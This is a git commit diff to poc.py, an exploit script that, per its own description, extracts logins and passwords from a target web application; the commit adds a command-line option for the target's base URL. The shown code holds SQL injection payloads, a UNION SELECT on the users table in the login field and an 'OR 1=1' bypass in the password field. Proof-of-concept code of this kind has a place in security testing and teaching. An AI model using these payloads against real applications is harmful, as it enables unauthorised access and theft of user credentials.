added argparse for poc and requirements

This commit is contained in:
2025-12-16 02:30:55 +10:00
parent d448005293
commit 59aaa4ced6
2 changed files with 8 additions and 1 deletions

8
poc.py Normal file → Executable file
View File

@@ -1,7 +1,13 @@
#!/usr/bin/env python3
import requests
import re
import argparse
BASE_URL = "http://localhost:8000"
parser = argparse.ArgumentParser(description="Exploit script for extracting logins and passwords.")
parser.add_argument("--base-url", default="http://localhost:80", help="Base URL of the target application")
args = parser.parse_args()
BASE_URL = args.base_url
login_payload = "' UNION SELECT login FROM users--"
form_data = {"login": login_payload, "password": "' OR 1=1--"}